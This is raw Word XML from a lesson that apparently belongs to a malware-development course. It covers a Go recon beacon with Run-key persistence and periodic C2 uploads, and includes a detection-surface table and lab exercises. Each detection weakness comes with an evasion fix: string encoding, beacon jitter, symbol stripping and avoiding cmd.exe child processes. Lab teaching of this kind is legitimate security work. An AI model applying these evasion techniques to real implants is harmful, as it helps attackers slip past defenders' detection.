        <w:t xml:space="preserve">'ReconBeacon' is a static IoC. Any EDR rule or Autoruns scan matching this string finds the persistence. Fix: encode the value name with the same XOR technique in Lesson 07.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="180" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E6DA4"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">5.3 Fixed Beacon Interval</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">An exact 60-second heartbeat is immediately flagged by Zeek's beacon detection algorithm. Fix: add random jitter to the sleep duration (Lesson 08).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="180" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E6DA4"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">5.4 Debug Symbols in Binary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">An unstripped Go binary exposes all function names — main.main, main.sendToC2, main.jitteredSleep. Ghidra and GoReSym read these without effort. Fix: compile with -ldflags="-s -w" (Lesson 09).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="180" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E6DA4"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">5.5 cmd.exe Child Process Chain</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Every exec.Command call spawns cmd.exe as a child process. The chain payload.exe &gt; cmd.exe &gt; systeminfo.exe is a known detection signature. A more advanced implementation would call Windows API functions directly via the syscall package to avoid spawning any child processes.</w:t>
      </w:r>
    </w:p>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6. Detection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Detection Surface</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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Sysmon EventID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cmd.exe child of payload — anomalous parent process path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Sysmon EventID 13</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Registry write to HKCU\...\Run — extremely high-signal SIEM rule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Sysmon EventID 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created at C:\temp\recon_combined.txt every ~60 seconds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Sysmon EventID 3</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Outbound TCP to C2 IP:5000 every ~60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Zeek / Suricata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Periodic beacon: same dst IP, same port, fixed inter-arrival time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Autoruns.exe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ReconBeacon value under HKCU Run — unsigned/unknown binary highlighted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strings.exe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C2 URL, registry path, and all command strings visible in plaintext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AV hash signature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SHA-256 of .exe — flagged after VirusTotal submission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EDR process tree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cmd.exe children spawned in rapid succession</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7. Exercises</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Run Version 3 on your lab VM. Open Autoruns.exe and verify the ReconBeacon Run key entry appears under the Logon tab. Log off and back on. Confirm the payload restarts automatically and a new beacon arrives at the C2.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Monitor the C2 uploads/ directory for 5 minutes. Count the beacon files. Is the interval exactly 60 seconds? Use the file timestamps to calculate the actual inter-arrival time.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Use Wireshark to capture 3 successive beacons with filter http.request.method == "POST". Note the Time column values. What would the inter-arrival time standard deviation look like to a Zeek beacon detection script?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Manually delete the Run key: reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v ReconBeacon /f. Restart the payload. Observe it re-creates the key on every execution. As an improvement, add a registry read check at startup: only run reg add if the key does not already exist.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Run strings.exe on the compiled v3.exe binary. List every string that is an operational indicator of compromise. This is the input list for Lesson 07 — each string on that list will become an encoded byte array.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Compare the file sizes of v1.exe, v2.exe, and v3.exe compiled with and without -ldflags="-s -w". Document the size reduction and explain what information is removed by the flags.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6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2026-03-31T23:04:34.006Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-03-31T23:04:34.007Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=docProps/custom.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/custom-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"/>
</file>